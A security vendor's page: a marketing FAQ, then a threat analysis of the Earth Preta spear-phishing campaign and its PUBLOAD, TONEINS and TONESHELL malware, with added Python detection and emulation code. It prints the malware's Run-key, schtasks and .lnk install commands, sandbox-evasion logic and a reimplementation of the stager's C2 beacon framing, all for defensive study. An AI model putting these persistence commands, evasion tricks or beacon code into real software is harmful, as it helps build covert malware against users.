Frequently Asked Questions

Threat Research & Earth Preta Campaign

What is the Earth Preta spear-phishing campaign and who does it target?

The Earth Preta spear-phishing campaign is a sophisticated cyberattack that targets government offices, especially those working with Myanmar, as well as organizations in the education and research sectors worldwide. The campaign uses stolen documents as decoys and spear-phishing emails with embedded Google Drive links to trick victims into downloading and executing malicious files. The attacks have a higher concentration in the Asia Pacific region but affect organizations globally.

How do Earth Preta attackers deliver their malware to victims?

Earth Preta attackers use spear-phishing emails with embedded Google Drive or Dropbox links. These emails often use decoy topics related to international events or sensational subjects to lure victims. The malicious archives delivered via these links contain malware families such as TONEINS, TONESHELL, and PUBLOAD, often disguised as legitimate files.

What malware families are associated with the Earth Preta campaign?

The Earth Preta campaign is associated with the PUBLOAD, TONEINS, and TONESHELL malware families. PUBLOAD acts as a stager to download additional payloads, TONEINS installs the TONESHELL backdoor, and TONESHELL serves as the main backdoor for persistent access and further exploitation.

What techniques do Earth Preta attackers use to evade detection?

Earth Preta attackers use several evasion techniques, including fake file extensions, sideloading malicious DLLs with legitimate executables, using compromised email accounts, and employing anti-sandbox and anti-debugging methods such as custom exception handlers and window interaction checks. These techniques help them bypass security controls and slow down investigations.

How does the Earth Preta campaign establish persistence on infected systems?

The campaign establishes persistence through registry Run keys and scheduled tasks that re-launch the payload at short, fixed intervals. PUBLOAD, for example, either adds a Run key under HKCU or creates a scheduled task that fires every minute, and the TONEINS installer creates a scheduled task that runs the TONESHELL backdoor every two minutes, so the malware keeps running after a reboot or after the process is killed.

What role do decoy documents play in the Earth Preta spear-phishing attacks?

Decoy documents are used to trick victims into believing the malicious files are legitimate. These documents often relate to ongoing international events or official communications, increasing the likelihood that recipients will open the files and inadvertently execute the malware.

How do Earth Preta attackers use email headers to evade detection?

Attackers place fake email addresses in the "To" header and the real victims' addresses in the "CC" header. This tactic helps evade automated security analysis and slows down investigations, as the emails appear less suspicious to security tools and analysts.

What anti-analysis techniques are used in the TONESHELL malware?

TONESHELL uses obfuscation, custom exception handlers that hide the real code flow, and an anti-sandbox check built on the GetForegroundWindow API: the malicious routine only runs after the foreground window has changed several times, which does not happen in an automated sandbox where no user is switching windows. The same check delays execution, so the backdoor's behavior is less likely to be observed during a sandbox run.

How does Cymulate help organizations defend against spear-phishing and advanced malware campaigns like Earth Preta?

Cymulate's Exposure Management Platform enables organizations to simulate real-world attack scenarios, including spear-phishing and malware campaigns, to validate their defenses. By running continuous automated attack simulations, Cymulate helps identify vulnerabilities, test security controls, and prioritize remediation efforts to reduce the risk of successful attacks like Earth Preta.

What resources does Cymulate offer for understanding and mitigating spear-phishing threats?

Cymulate provides whitepapers, technical guides, and case studies focused on exposure management, threat validation, and email-based threats. Notable resources include the "Exposure Management Platform and CTEM Whitepaper" and "The Stress from Email-based Threats" guide, which offer practical insights for defending against spear-phishing attacks. Explore Cymulate's resources.

Features & Capabilities

What features does Cymulate offer for exposure management and threat validation?

Cymulate offers continuous threat validation, breach and attack simulation (BAS), continuous automated red teaming (CART), exposure analytics, attack path discovery, cloud validation, and an extensive threat library with daily updates. These features help organizations proactively identify and remediate vulnerabilities across their environments. Learn more about Cymulate's platform.

Does Cymulate support integration with other security tools?

Yes, Cymulate integrates with a wide range of security technologies, including EDR and anti-malware solutions (e.g., CrowdStrike Falcon, Cisco Secure Endpoint), SIEM platforms (e.g., CrowdStrike Falcon LogScale), cloud security tools (e.g., AWS GuardDuty, Check Point CloudGuard), network security (e.g., Akamai Guardicore), and vulnerability management (e.g., CrowdStrike Falcon Spotlight). See the full list of integrations.

How does Cymulate's 'Threat (IoC) updates' feature improve threat resilience?

Cymulate's 'Threat (IoC) updates' feature provides recommended Indicators of Compromise (IoCs) that can be exported and applied directly to security controls. This enables control owners to quickly build defenses against new threats, improving overall threat resilience. IoCs can be exported via the UI or API in plain text or STIX format. (Source: EM Platform Message Guide)

What technical documentation is available for Cymulate users?

Cymulate offers a range of technical resources, including whitepapers, guides, solution briefs, data sheets, and industry reports. These resources cover topics such as exposure management, CTEM, vulnerability management, detection engineering, and threat validation. Access Cymulate's technical documentation.

How does Cymulate help with exposure prioritization and remediation?

Cymulate automates threat validation and prioritization, ranking vulnerabilities based on exploitability, business context, and threat intelligence. This enables organizations to focus remediation efforts on the most critical exposures, improving operational efficiency and reducing risk. Learn more.

What is Cymulate's approach to cloud security validation?

Cymulate provides dedicated validation features for hybrid and cloud environments, enabling organizations to assess and optimize their cloud security controls. Integrations with cloud security tools and automated testing help address the unique challenges of cloud complexity. Learn more about cloud validation.

How does Cymulate support detection engineering and SIEM optimization?

Cymulate streamlines detection engineering by enabling users to build, validate, and optimize threat detections at scale. The platform includes features for SIEM rule mapping and continuous validation, helping organizations improve mean time to detect and respond to threats. Read the solution brief.

Use Cases & Benefits

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, security leaders, SecOps teams, red teams, and vulnerability management teams across organizations of all sizes and industries. It is especially valuable for organizations seeking to improve visibility, automate threat validation, and prioritize remediation. Learn more about target roles.

What business impact can customers expect from using Cymulate?

Customers have reported an 81% reduction in cyber risk within four months, a 60% increase in team efficiency, 40X faster threat validation, and a 52% reduction in critical exposures. These outcomes are supported by case studies such as Hertz Israel and Nemours Children's Health. Read the Hertz Israel case study.

How easy is it to implement Cymulate and start using it?

Cymulate is known for its quick and straightforward implementation. It operates in agentless mode, requiring no additional hardware or complex configurations. Customers can start running simulations almost immediately, and robust support is available to ensure a smooth onboarding process. (Source: Customer testimonials)

What feedback have customers given about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive and user-friendly platform. Security professionals highlight the ease of implementation, actionable insights, and the platform's ability to quickly identify and address security gaps. (Source: Customer testimonials)

What pain points does Cymulate solve for security teams?

Cymulate addresses overwhelming threat volumes, lack of visibility, unclear prioritization, operational inefficiencies, fragmented tools, cloud complexity, and communication barriers. The platform provides continuous threat validation, actionable insights, and unified exposure management to solve these challenges. Learn more.

Are there case studies showing Cymulate's effectiveness for different industries?

Yes, Cymulate features case studies across industries such as financial services, healthcare, energy, and retail. Examples include Hertz Israel (cyber risk reduction), Nemours Children's Health (improved detection), and a sustainable energy company (cloud compliance automation). Browse Cymulate case studies.

How does Cymulate tailor its solutions for different security roles?

Cymulate addresses the unique needs of CISOs, SecOps teams, red teams, and vulnerability management teams by providing role-specific metrics, automation, and actionable insights. Each persona benefits from features designed to solve their specific pain points. Learn more about role-based solutions.

Security, Compliance & Company Information

What security and compliance certifications does Cymulate hold?

Cymulate is certified for SOC 2 Type II, ISO 27001:2013 (Information Security Management), ISO 27701 (Privacy Information Management), ISO 27017 (Cloud Services Security), and CSA STAR Level 1. These certifications demonstrate Cymulate's commitment to security, privacy, and cloud compliance. Learn more about Cymulate's security.

How does Cymulate ensure data protection and privacy?

Cymulate adopts a holistic approach to GDPR, employs a dedicated privacy and security team, and hosts services in secure AWS data centers. Data is encrypted in transit (TLS 1.2+) and at rest (AES-256), and the platform follows a strict Secure Development Lifecycle (SDLC) with regular audits and penetration tests. Read more about data protection.

What is Cymulate's company background and industry recognition?

Cymulate was founded in 2016 and serves over 1,000 customers in 50 countries. The company is recognized as a leader in cybersecurity, with a mission to revolutionize proactive security management. Cymulate has been named a Customers' Choice in the 2025 Gartner Peer Insights and a market leader by Frost & Sullivan. Learn more about Cymulate.

What is Cymulate's vision and mission?

Cymulate's vision is to revolutionize cybersecurity by fostering a proactive approach to managing threats. The mission is to empower organizations to manage their security posture effectively and improve resilience against evolving threats. Read about Cymulate's mission.

Pricing & Plans

What is Cymulate's pricing model?

Cymulate operates on a subscription-based pricing model tailored to each organization's needs. Pricing depends on the selected package, number of assets, and scenarios for testing. For a personalized quote, schedule a demo with Cymulate.

Competition & Comparison

How does Cymulate compare to AttackIQ?

AttackIQ provides automated security validation but lacks Cymulate's innovation, threat coverage, and ease of use. Cymulate offers a more comprehensive threat scenario library and advanced AI-powered features, making it easier to use and more effective for improving security posture. Read more.

How does Cymulate compare to Mandiant Security Validation?

Mandiant is an original BAS platform but has seen less innovation in recent years. Cymulate continually innovates with AI and automation and has expanded into exposure management, offering a more advanced and comprehensive solution. Read more.

How does Cymulate compare to Pentera?

Pentera focuses on attack path validation but lacks the depth of Cymulate's full exposure validation platform, which covers the entire kill chain and includes cloud control validation. Read more.

How does Cymulate compare to Picus Security?

Picus Security offers BAS with on-prem options but does not provide Cymulate's comprehensive exposure validation, full kill chain coverage, or cloud control validation. Read more.

How does Cymulate compare to SafeBreach?

SafeBreach provides breach and attack simulation but lacks Cymulate's innovation, precision, and automation. Cymulate offers a full CTEM solution, comprehensive exposure validation, and advanced automation with the industry's largest attack library. Read more.

How does Cymulate compare to Scythe?

Scythe is designed for advanced red teams to build custom attack campaigns but lacks Cymulate's ease of use, continuous validation, and actionable remediation guidance. Cymulate provides automated, no-code workflows, daily threat updates, and specific mitigation guidance. Read more.


Earth Preta Spear-Phishing Governments Worldwide

November 20, 2022

The attackers use stolen documents as decoys to trick targeted organizations that work with Myanmar government offices into downloading and executing the malicious files. The victimology covers a broad range of organizations and verticals worldwide, with a higher concentration in the Asia Pacific region. Apart from government offices with collaborative work in Myanmar, subsequent victims included the education and research industries, among others. In addition to decoy topics covering ongoing international events concerning specific organizations, the attackers also lure individuals with subject headings pertaining to pornographic materials.

Earth Preta uses spear-phishing emails as its first step for intrusion. As mentioned, some of the emails' subjects and contents discuss geopolitical topics, while others carry sensational subjects. All of the emails the researchers analyzed had Google Drive links embedded in them, which points to how users are tricked into downloading the malicious archives. The archive file types include compressed files such as .rar, .zip, and .jar, to name a few. Upon accessing the links, the researchers found that the archives contain the TONEINS, TONESHELL, and PUBLOAD malware families.

Analysis of the email contents showed that a Google Drive link is used as the lure. The email's subject might be empty or might have the same name as the malicious archive. Rather than adding the victims' addresses to the email's "To" header, the threat actors put fake addresses there, while the real victims' addresses were written in the "CC" header, likely to evade security analysis and slow down investigations. Probing the Gmail addresses in the "To" field with the open-source intelligence (OSINT) tool GHunt showed that these fake accounts contain little information.
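The header trick described above is easy to score for in a mail-gateway or SOAR rule. The following is an added example, not code from the report: it takes a raw message, checks whether the organization's own addresses appear only in "CC" while "To" holds throwaway Gmail accounts, whether the lure is a Google Drive or Dropbox link, and whether the subject is empty or equals an archive name mentioned in the body (the .rar/.zip/.jar types named in the report). The organization domain, the two sample messages and the Drive URL are constructed for the example.

```python
"""Score a message for the Earth Preta spear-phishing header pattern.

Added example, not part of the original report. ORG_DOMAIN, the sample
messages and the Drive link are constructed assumptions.
"""
import re
from email import message_from_string
from email.utils import getaddresses
from typing import Dict
from urllib.parse import urlparse

ORG_DOMAIN = "example.gov"   # assumption: the defended organisation's mail domain
LURE_HOSTS = {"drive.google.com", "docs.google.com", "dropbox.com", "www.dropbox.com"}
ARCHIVE_EXT_RE = r"\.(?:rar|zip|jar)"   # archive types named in the report

# Constructed sample mirroring the report: fake Gmail address in To,
# real victims in Cc, subject equal to the archive name, Drive link in body.
SAMPLE_PHISH = """\
From: liaison@partner-ministry.example
To: qwerty98765@gmail.com
Cc: analyst@example.gov, director@example.gov
Subject: Assistance and Recovery(china).rar
Content-Type: text/plain; charset=utf-8

Please find the meeting schedule in Assistance and Recovery(china).rar:
https://drive.google.com/file/d/EXAMPLE-FILE-ID/view
"""

SAMPLE_BENIGN = """\
From: colleague@example.gov
To: analyst@example.gov
Subject: Q3 budget meeting
Content-Type: text/plain; charset=utf-8

Draft agenda is on the intranet: https://intranet.example.gov/agenda
"""


def _addresses(msg, header: str):
    return [addr.lower() for _, addr in getaddresses(msg.get_all(header, []))]


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1]


def _body_text(msg) -> str:
    """Collect every text/plain part (handles both single-part and multipart)."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    chunks = []
    for part in parts:
        if part.get_content_type() == "text/plain":
            raw = part.get_payload(decode=True) or b""
            chunks.append(raw.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def score_message(raw: str) -> Dict[str, object]:
    msg = message_from_string(raw)
    to_addrs, cc_addrs = _addresses(msg, "To"), _addresses(msg, "Cc")
    subject = (msg.get("Subject") or "").strip()
    body = _body_text(msg)
    urls = re.findall(r"https?://[^\s<>\"']+", body)
    stem = re.sub(ARCHIVE_EXT_RE + r"$", "", subject, flags=re.I)

    flags = {
        # nobody from the org in To, but org recipients hidden in Cc
        "victims_only_in_cc": bool(cc_addrs)
        and not any(_domain(a) == ORG_DOMAIN for a in to_addrs)
        and any(_domain(a) == ORG_DOMAIN for a in cc_addrs),
        # every To address is a throwaway Gmail account
        "to_is_freemail": bool(to_addrs) and all(_domain(a) == "gmail.com" for a in to_addrs),
        # lure hosted on Google Drive or Dropbox
        "lure_link": any(urlparse(u).hostname in LURE_HOSTS for u in urls),
        # subject empty, or identical to an archive name mentioned in the body
        "subject_matches_archive": not subject
        or bool(re.search(re.escape(stem) + ARCHIVE_EXT_RE, body, re.I)),
    }
    flags["score"] = sum(1 for v in flags.values() if v)
    return flags


if __name__ == "__main__":
    print(score_message(SAMPLE_PHISH))    # all four flags set, score 4
    print(score_message(SAMPLE_BENIGN))   # score 0
```

A score of 3 or more is a reasonable quarantine threshold; the "victims only in CC" trait on its own is rare in legitimate mail and worth alerting on even without the link check.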
Moreover, some of the senders appear to be compromised email accounts belonging to a specific organization. Victims might be convinced that these mails were sent by trusted partners, increasing the chances that recipients will click the malicious links. The researchers also found decoy documents linked to organizations related to or working with Myanmar government entities. The first decoy's file name is Assistance and Recovery(china).exe, while another decoy .PDF document, with a title that can be translated as "Embassy of the Republic of Myanmar", was observed in a compressed file named Assistance and Recovery(china).rar. Allegedly, this is a document containing the ambassador's report on rough meeting schedules between the embassies of Myanmar and China.

At least three types of arrival vectors were observed as the intrusions' entry points, including over 30 lure archives distributed around the world via Google Drive links, Dropbox links, or other IP addresses hosting the files. Most of the collected archives contain a legitimate executable together with the DLL it sideloads. The names of the archives and the decoy documents vary in each case; the following sections take some of them as examples and share the TTPs of each.

Inside the archive, the "~" file is a lure document. The executable Increasingly confident US is baiting China.exe is a legitimate executable (originally named adobe_licensing_wf_helper.exe, the Adobe Licensing WF Helper). This executable sideloads the malicious libcef.dll and triggers its export function cef_api_hash. When executed for the first time, the executable tries to install the malware by copying the .exe file and moving libcef.dll (detected by Trend Micro as Trojan.Win32.PUBLOAD); the two files are renamed C:\Users\Public\Pictures\adobe_wf.exe and C:\Users\Public\Pictures\libcef.dll, respectively. Additionally, "~" is renamed 05-09-2022.docx and dropped to the Desktop.
The malicious archive contains three files: New Word Document.lnk, putty.exe, and CefBrowser.dll. In particular, the DLL and executable files are placed in multiple layers of folders named "_". The threat actor uses the .lnk file to install the malicious files by decompressing the archive with WinRAR. The full command line is as follows:

%ComSpec% /c "_\_\_\_\_\_\putty.exe||(forfiles /P %APPDATA%\..\.. /S /M Desktop.rar /C "cmd /c (c:\progra~1\winrar\winrar.exe x -inul -o+ @path||c:\progra~2\winrar\winrar.exe x -inul -o+ @path)&&_\_\_\_\_\_\putty.exe")"

putty.exe masquerades as a normal executable; its original file name is AppXUpdate.exe. When executed, it sideloads CefBrowser.dll and runs the main routine in its export function, CCefInterface::SubProcessMain. It also abuses schtasks for persistence.

Fake file extensions are used as well. libcef.dll (detected by Trend Micro as Trojan.Win32.TONEINS) is an installer for the next-stage malware. It copies two files with names starting with "~", in this case ~$20220817.docx and ~$20220617(1).docx. Both files have fake file extensions and masquerade as the temporary files Microsoft Office generates while a document is open.

In this campaign, the following malware was identified: PUBLOAD, TONEINS, and TONESHELL. PUBLOAD is a stager that downloads the next-stage payload from its command-and-control (C&C) server. This malware was first disclosed by Cisco Talos in May 2022. Once the .dll is executed, it first checks whether the same process is already running by calling OpenEventA. According to a tweet posted by Barberousse, some of the event names are the Twitter usernames of other cybersecurity researchers, such as "moto_sato", "xaacrazyman_armyCIAx", and "JohnHammondTeam". These researchers have nothing to do with PUBLOAD; the threat actors simply and intentionally placed the names in the binaries.
PUBLOAD creates a directory and drops all the malware, including the malicious DLL and the legitimate executable, into it. It then tries to establish persistence in one of the following ways:

1. Adding a registry Run key:
cmd.exe /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Graphics /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_RunDLL "C:\Users\Public\Libraries\Graphics\AdobeLicensing.exe"" /f

2. Creating a scheduled task:
schtasks.exe /F /Create /TN Microsoft_Licensing /sc minute /MO 1 /TR C:\Users\Public\Libraries\Graphics\AdobeLicensing.exe

PUBLOAD decrypts its shellcode in memory with AES. The shellcode is invoked either by creating a thread or through Windows APIs that accept a callback-function argument, which serve as an alternative way to transfer execution to the shellcode. Several such APIs were observed, including GrayStringW, EnumDateFormatsA, and LineDDA; routing execution through them can be considered a technique to bypass antivirus monitoring and detection.

The decrypted PUBLOAD shellcode collects the computer name and the username as the payload of the first beacon. The payload is then encrypted with a predefined RC4 (Rivest Cipher 4) key; as of this writing, all stagers seen so far share the same key. After encryption, the stager prepends a specific header to the packet: the magic bytes "17 03 03" and the payload size, followed by the encrypted data. The stager also checks whether the response packet carries the same magic header, "17 03 03". If so, the downloaded payload in memory is treated as shellcode and executed directly.

Trojan.Win32.TONEINS is the installer for TONESHELL backdoors. The installer drops the TONESHELL malware to the %PUBLIC% folder and establishes persistence for it. TONEINS usually comes in the lure archives, and in most cases the TONEINS DLL is named libcef.dll.
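The beacon framing is worth reproducing, because the magic bytes 17 03 03 are also the header of a TLS 1.2 application-data record, so on the wire the stager's traffic resembles an HTTPS session at a glance even though no TLS handshake ever takes place. The following is an added example, not the stager's code or the report's: it builds a first beacon, mirrors the response check, and shows a network-side heuristic. Assumptions beyond the report: the size field is a 2-byte big-endian value like a TLS record length, the computer name and username are joined by a NUL byte, and the RC4 key is a placeholder (the real shared key is not given on this page).

```python
"""PUBLOAD-style beacon: MAGIC || size || RC4(computer_name \\0 user_name).

Added example, not the malware's or the report's code. The size encoding,
the NUL separator and RC4_KEY are assumptions.
"""
import struct
from typing import Optional

MAGIC = b"\x17\x03\x03"              # same bytes as a TLS 1.2 application-data record header
RC4_KEY = b"placeholder-rc4-key"     # assumption: stand-in for the shared key


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encrypting and decrypting are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_beacon(computer_name: str, user_name: str, key: bytes = RC4_KEY) -> bytes:
    """First beacon as the report describes it: header, payload size, RC4 body."""
    plain = computer_name.encode() + b"\x00" + user_name.encode()
    enc = rc4(key, plain)
    return MAGIC + struct.pack(">H", len(enc)) + enc


def frame_ok(packet: bytes) -> bool:
    """The stager's own check: magic present and declared size matches the body."""
    if len(packet) < 5 or packet[:3] != MAGIC:
        return False
    (size,) = struct.unpack(">H", packet[3:5])
    return len(packet) - 5 == size


def parse_packet(packet: bytes, key: bytes = RC4_KEY) -> Optional[bytes]:
    """Return the decrypted body, which the real stager would run as shellcode,
    or None when the packet fails the framing check."""
    if not frame_ok(packet):
        return None
    return rc4(key, packet[5:])


def looks_like_pubload_beacon(first_bytes: bytes) -> bool:
    """Network-side heuristic: a genuine TLS session opens with a handshake
    record (type 0x16, the ClientHello). Application data (0x17) as the very
    first record on a connection, framed as one exact-length record, fits the
    stager and not a browser."""
    return frame_ok(first_bytes)


if __name__ == "__main__":
    pkt = build_beacon("DESKTOP-TEST", "alice")
    print(pkt.hex())
    print(parse_packet(pkt))
```

The key-independent check in looks_like_pubload_beacon is the useful part for detection engineering: a sensor does not need the RC4 key to notice application-data records with no preceding ClientHello on port 443.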
The malicious routine is triggered by calling its export function cef_api_hash. The TONEINS malware is obfuscated, likely to slow down analysis. It contains a lot of junk code in its control flow and plenty of useless XOR instructions, as though to imply that these decode strings. On inspection, the obfuscated code turned out to be reused from an open-source repository. The installer establishes persistence for TONESHELL backdoors with the following schtasks command:

schtasks /create /sc minute /mo 2 /tn "ServiceHub.TestWindowStoreHost" /tr "C:\Users\Public\Pictures\ServiceHub.TestWindowStoreHost.exe" /f

The file names of the dropped TONESHELL malware differ from case to case, and so do the names of the scheduled tasks. After persistence is established, the installer copies the legitimate executable and the malicious DLL to the %PUBLIC% folder; in the lure archive, both files have names that start with "~".

TONESHELL is the main backdoor used in this campaign. It is a shellcode loader that loads and decodes the backdoor shellcode in memory with a 32-byte key. The earlier version of TONESHELL has the capabilities of TONEINS, including establishing persistence and installing backdoors. The more recent version, however, is a standalone backdoor without any installer capabilities (for example, the file ~$Talk points.docx). It is obfuscated in a similar fashion to TONEINS, indicating that the actors continue to update their arsenal and separate the tools in order to bypass detection. To make sure that TONESHELL is installed correctly, Backdoor.Win32.TONESHELL first checks whether the process path matches the expected one. If so, the malicious code is triggered through a custom exception handler; the adversary hides the actual code flow behind the implementation of custom exception handlers.
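Both persistence mechanisms quoted in this report, the PUBLOAD Run key and scheduled task and the TONEINS scheduled task above, share traits that are easy to hunt for: the payload lives under C:\Users\Public, the Run key launches it indirectly through SHELL32.DLL,ShellExec_RunDLL, and the tasks repeat every one or two minutes. The following is an added example, not part of the report: it parses reg query output for the HKCU Run key and Task Scheduler XML files (the per-task files under C:\Windows\System32\Tasks use the Triggers/Repetition/Interval and Actions/Exec/Command layout), and flags entries with those traits. The reg query text and both task XML documents are constructed to mirror the commands quoted in the report.

```python
"""Hunt for Run-key and scheduled-task persistence with the traits in the report.

Added example, not the report's code. REG_QUERY_OUTPUT and the two task XML
documents are constructed samples.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

PUBLIC_RE = re.compile(r"c:\\users\\public\\", re.I)
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed `reg query HKCU\...\Run` output: one normal entry, one PUBLOAD-style entry.
REG_QUERY_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Graphics    REG_SZ    Rundll32.exe SHELL32.DLL,ShellExec_RunDLL "C:\Users\Public\Libraries\Graphics\AdobeLicensing.exe"
"""

# Constructed task XML equivalent to: schtasks /create /sc minute /mo 2 /tr "C:\Users\Public\Pictures\..."
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT2M</Interval></Repetition>
      <StartBoundary>2022-11-01T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Users\Public\Pictures\ServiceHub.TestWindowStoreHost.exe</Command></Exec>
  </Actions>
</Task>"""

# Constructed benign task: hourly updater installed under Program Files.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <Repetition><Interval>PT1H</Interval></Repetition>
      <StartBoundary>2022-11-01T09:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\Example Vendor\updater.exe</Command><Arguments>/check</Arguments></Exec>
  </Actions>
</Task>"""


def suspicious_run_values(reg_output: str) -> List[Dict[str, object]]:
    """Flag Run values whose data points under C:\\Users\\Public or goes through ShellExec_RunDLL."""
    hits = []
    for line in reg_output.splitlines():
        m = re.match(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$", line)   # value rows are indented
        if not m:
            continue
        name, _type, data = m.groups()
        reasons = []
        if PUBLIC_RE.search(data):
            reasons.append("payload under C:\\Users\\Public")
        if "shellexec_rundll" in data.lower():
            reasons.append("launch via SHELL32!ShellExec_RunDLL")
        if reasons:
            hits.append({"value": name, "data": data, "reasons": reasons})
    return hits


def _interval_minutes(iso: str) -> Optional[float]:
    """Convert an ISO 8601 time-only duration such as PT2M or PT1H30M to minutes."""
    m = re.fullmatch(r"PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", iso or "")
    if not m:
        return None
    h, mi, s = (int(x) if x else 0 for x in m.groups())
    return h * 60 + mi + s / 60


def suspicious_task(task_xml: str, max_minutes: float = 5) -> Optional[Dict[str, object]]:
    """Flag a task that runs something under C:\\Users\\Public or repeats every few minutes."""
    root = ET.fromstring(task_xml)
    reasons = []
    for cmd in root.findall(".//t:Actions/t:Exec/t:Command", NS):
        if PUBLIC_RE.search(cmd.text or ""):
            reasons.append("command under C:\\Users\\Public: " + cmd.text)
    for iv in root.findall(".//t:Triggers//t:Repetition/t:Interval", NS):
        mins = _interval_minutes(iv.text)
        if mins is not None and mins <= max_minutes:
            reasons.append("repeats every " + iv.text)
    return {"reasons": reasons} if reasons else None


if __name__ == "__main__":
    print(suspicious_run_values(REG_QUERY_OUTPUT))
    print(suspicious_task(TASK_XML))
    print(suspicious_task(BENIGN_TASK_XML))
```

On a live host the same functions can be fed the output of reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run and the contents of each file under C:\Windows\System32\Tasks; anything writable by a standard user that re-launches every minute or two deserves a look regardless of how legitimate its task name sounds.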
Different exception handlers are invoked depending on the result of the process name check, and the malicious routine continues by raising the exception with a call to _CxxThrowException. Once invoked, the C++ runtime walks from the ThrowInfo structure down to the CatchProc member of the _msRttiDscr structure to find the matching handler, and that handler contains the real malicious code. In this sample, the exception handler is located at offset 0x10005300. This technique not only hides the execution flow but also stops the analyst's debugger.

More recent TONESHELL samples add an anti-sandbox technique not present in earlier versions. The newer versions invoke the GetForegroundWindow API twice and check whether the foreground window has changed. In a sandbox, both calls typically return the same window handle, because most sandboxes involve no human interaction and the foreground window never changes. In addition, as a combined anti-sandbox and delayed-execution measure, the malicious routine is only triggered once the foreground window has been switched for the fifth time. After the malicious exception handler fires, it starts decoding the next-stage TONESHELL shellcode: it first decodes a 32-byte key by XORing each byte with 0x7D, and that key is then used to decode the shellcode body.
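An analyst who wants to extract the second stage without waiting for the sandbox check has to reproduce both the gate and the decoding. The following is an added example, not TONESHELL's code or the report's: the GetForegroundWindow call is injected as a function so the logic runs on any platform, the gate counts foreground changes and releases on the fifth, the 32-byte key is recovered by XOR with 0x7D, and the body is then decoded. The sample key and body are constructed, and the body decode is assumed to be repeating-key XOR with that key, since the report does not name the algorithm.

```python
"""Emulate the TONESHELL foreground-window gate and key/shellcode decoding.

Added example, not the malware's code. The window source is injected, the
sample key and body are constructed, and repeating-key XOR for the body
is an assumption.
"""
from itertools import cycle
from typing import Callable, Iterable, Optional, Tuple

REQUIRED_SWITCHES = 5   # the routine runs once the foreground window has switched a fifth time
KEY_MASK = 0x7D         # the 32-byte key is stored XORed with this byte
KEY_LEN = 32


def foreground_switch_gate(get_foreground_window: Callable[[], int], max_polls: int = 10_000) -> bool:
    """True once the foreground window handle has changed REQUIRED_SWITCHES times.
    False if it never does within max_polls, which is what an unattended sandbox sees."""
    last = get_foreground_window()
    switches = 0
    for _ in range(max_polls):
        cur = get_foreground_window()
        if cur != last:
            switches += 1
            last = cur
            if switches >= REQUIRED_SWITCHES:
                return True
    return False


def window_source(handles: Iterable[int]) -> Callable[[], int]:
    """Turn a sequence of fake HWNDs into a GetForegroundWindow stand-in; the last
    handle is repeated forever once the sequence is exhausted."""
    it = iter(handles)
    state = {"last": 0}

    def _get() -> int:
        try:
            state["last"] = next(it)
        except StopIteration:
            pass
        return state["last"]

    return _get


def decode_key(encoded_key: bytes) -> bytes:
    if len(encoded_key) != KEY_LEN:
        raise ValueError("expected a 32-byte encoded key")
    return bytes(b ^ KEY_MASK for b in encoded_key)


def decode_body(body: bytes, key: bytes) -> bytes:
    """Assumption: repeating-key XOR with the recovered 32-byte key."""
    return bytes(b ^ k for b, k in zip(body, cycle(key)))


def run_loader(get_foreground_window: Callable[[], int], encoded_key: bytes,
               encoded_body: bytes, max_polls: int = 10_000) -> Optional[bytes]:
    """The gated decode: nothing is decoded unless the window check passes."""
    if not foreground_switch_gate(get_foreground_window, max_polls):
        return None
    return decode_body(encoded_body, decode_key(encoded_key))


def encode_for_sample(key: bytes, body: bytes) -> Tuple[bytes, bytes]:
    """Inverse operations (XOR is its own inverse); used only to build the sample blob."""
    return decode_key(key), decode_body(body, key)


SAMPLE_KEY = bytes(range(0x10, 0x30))            # constructed 32-byte key
SAMPLE_SHELLCODE = b"\x90" * 8 + b"\xcc"          # constructed stand-in body (NOPs + int3)
ENCODED_KEY, ENCODED_BODY = encode_for_sample(SAMPLE_KEY, SAMPLE_SHELLCODE)

if __name__ == "__main__":
    user = window_source([0x1001, 0x1002, 0x1003, 0x1004, 0x1005, 0x1006])   # a person switching windows
    sandbox = window_source([0x1001])                                        # one window, never changes
    print(run_loader(user, ENCODED_KEY, ENCODED_BODY))        # decoded body
    print(run_loader(sandbox, ENCODED_KEY, ENCODED_BODY))     # None
```

The gate also shows what a sandbox has to do to defeat this sample: rotate the foreground window handle at least five times during the run (or patch GetForegroundWindow), rather than simply extending the timeout, since no amount of waiting changes a window that nobody switches.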